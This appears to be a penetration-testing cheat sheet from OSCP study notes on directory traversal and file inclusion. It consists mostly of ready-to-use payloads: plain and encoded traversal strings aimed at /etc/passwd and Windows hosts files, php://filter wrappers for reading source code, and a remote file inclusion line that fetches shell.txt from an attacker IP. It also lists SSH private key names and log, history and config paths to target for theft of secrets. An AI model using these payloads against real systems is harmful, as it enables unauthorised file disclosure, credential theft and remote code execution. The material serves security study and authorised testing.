// notes/ Web Exploitation
🕸️

Directory Traversal

1. View users on machine

#web applications#adot8
source · oscp.adot8.com · web-applications/directory-traversal

Directory Traversal

  1. View users on machine
  2. Search for SSH Keys
  3. Search for passwords in log or configuration files (.htaccess, config.php)
code
01../../../../../../../../../etc/passwd
02../../../../../../../../../windows/system32/drivers/etc/hosts
03..\..\..\..\..\..\..\..\..\windows\system32\drivers\etc\hosts
code
01/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
02/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/system32/drivers/etc/hosts
03\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\windows\system32\drivers\etc\hosts
<pre><code>php://filter/resource=/etc/passwd <strong>php://filter/convert.base64-encode/resource=about.html </strong>php://filter/read=string.rot13/resource=index.php </code></pre>
code
01index.php?page=http://10.10.14.10/shell.txt

Port knocking ; trigger ports to open from executing port knocking file

code
01/etc/knockd.conf

SSH

{% hint style="info" %} SSH keys are also stored under C:\Users\user\.ssh {% endhint %}

code
01id_rsa
02id_ecdsa
03id_ecdsa_sk
04id_ed25519
05id_ed25519_sk
06id_dsa
code
01authorized_keys
02id_rsa.keystore
03id_rsa.pub
04known_hosts

HTTPD, Apache2, Nginx

code
01/var/log/apache/access.log
02/var/log/apache2/access.log
03/var/log/apache/access_log
04/var/log/apache2/access_log
05/var/log/access_log
06/var/log/nginx/access.log
07/var/log/nginx/access_log
08/etc/httpd/logs/acces_log
09/etc/httpd/logs/error_log
10/var/www/logs/access_log
11/var/www/logs/access.log
12/usr/local/apache/logs/access. log
13/opt/apache2/logs/access_log
14/opt/apache2/logs/access.log
15/opt/apache/logs/access_log
16/opt/apache/logs/access.log

IIS

code
01C:\inetpub\logs\LogFiles\W3SVC1\
02C:\inetpub\wwwroot\web.config

Linux user specific

code
01.bash_history
02.mysql_history
03.my.cnf

Windows

code
01c:\apache\php\php.ini
02c:\xampp\apache\bin\php.ini
03c:\xampp\apache\logs\access.log
04c:\Program Files\Apache Group\Apache\conf\httpd.conf
05c:\Program Files\Apache Group\Apache2\conf\httpd.conf
06c:\Program Files\xampp\apache\conf\httpd.conf